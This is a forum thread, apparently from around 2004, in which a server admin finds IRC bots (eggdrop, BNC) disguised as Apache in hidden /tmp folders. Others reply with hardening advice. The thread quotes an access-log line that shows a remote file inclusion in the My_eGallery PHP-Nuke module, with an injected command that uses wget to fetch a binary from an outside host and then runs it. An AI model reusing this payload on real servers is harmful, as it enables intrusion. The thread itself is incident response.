10165 (eggdrop) /tmp/.shp/.dat/eggdrop-1.6. /tmp/.shp/.dat
/usr/local/apache/sbin/httpd-DSSL
-m bin.txt

--------------------------------------------------------------------------------
10336 (eggdrop) /tmp/.sho/.dat/eggdrop-1.6. /tmp/.sho/.dat
/usr/local/apache/sbin/httpd-DSSL
-m bin.txt


what are those? am i hack?

In my tmp,

drwxr-xr-x 3 nobody nobody 4096 Apr 21 22:54 .shc/
drwxr-xr-x 3 nobody nobody 4096 Apr 17 19:00 .shh/
drwxr-xr-x 3 nobody nobody 4096 Apr 24 08:37 .sho/
drwxr-xr-x 3 nobody nobody 4096 Apr 24 08:35 .shp/
drwxr-xr-x 3 nobody nobody 4096 Apr 21 22:56 .shw/
drwxr-xr-x 3 nobody nobody 4096 Apr 17 18:55 .ssh/

It certainly looks like you've been hacked.
What does "ls -alR /tmp" produce?

drwxr-xr-x 3 nobody nobody 4096 Apr 21 22:54 .shc/
drwxr-xr-x 3 nobody nobody 4096 Apr 17 19:00 .shh/
drwxr-xr-x 3 nobody nobody 4096 Apr 24 08:37 .sho/
drwxr-xr-x 3 nobody nobody 4096 Apr 24 08:35 .shp/
drwxr-xr-x 3 nobody nobody 4096 Apr 21 22:56 .shw/
drwxr-xr-x 3 nobody nobody 4096 Apr 17 18:55 .ssh/

these are the directories the hacker create.

I believe he hack via openssl.

I do not know how he did it since i always keep the server updated with the latest patches.. be it cpanel,kernel etc.

Please try "ls -alR" - include the "R" - there surely must be something in all those directories.

yes. there's directories in it. From one look, the hacker install eggdrop , BNC.

I have deleted them all.

I am wondering how they manage to create and put those programs into /tmp

It would help if you tell us what kind of services your runnin on your web server, are you a webhost etc, settings like php safe mode, open base etc..

Greetings:

Are your compilers and fetch programs (wget, lynx, et all) set up with root-only access?

Do you have your tmp directory in its own partition with /var/tmp and /usr/tmp linked to /tmp? Is it set up to have noexec, nosuid?

Are you running the latest kernel?

Is your web server patched up to date?

Are you running tripwire?

Do you have LibSafe installed?

Do you have a firewall installed? Is it managed?

Do you have any intrusion detecion systems in place? Are they managed?

Thank you.

scan your box to check if you have a root kit installed !

How To install a Chrootkit HERE

did you disable direct root login ???

is your password easy to find ?
Change all your password to password Mixed with numbers et letters
example: mN7R5tZa
Password Generator

Apparently, someone upload those eggdrop program to /tmp through a vulnerable script.

To fix it,

Change your permission for /tmp to non-executable.

If you are using cpanel, do the following command to secure your tmp.

/scripts/updatenow
/scripts/securetmp

If any of your website running on mysql report mysql.sock error, try kill all mysql processes and restart mysql.

Latest update, I finally trace down to where the insecure script is in.

There's a security hole in the module "My_eGallery" for PHPNUKE.

Here's the log:

domain1.com:202.155.82.190 - - [11/May/2004:14:09:23 +0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/irclordz/inject.txt?&cmd=uname%20-a%20;%20id%20;%20cd%20/tmp%20;%20mkdir%20bin%20;%20cd%20bin%20;%20wget%20freewebs.com/irclordz/httpd%20;%20chmod%20755%20httpd%20;%20./httpd HTTP/1.0" 200 1668 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

All users are to search for the file called "displayCategory.php".

Please check if your clients are using My_eGallery module.

I've seen this before, they made the eggdrop look like it was apache. lsof showed the suspected apache proccess was an eggdrop. Things that can help prevent this type of attack:

chmod 700 /usr/bin/wget

add to php.ini:

disable_functions = system, exec, shell_exec

noexec,nosuid = /tmp /var/tmp

make sure you are always running an updated kernel.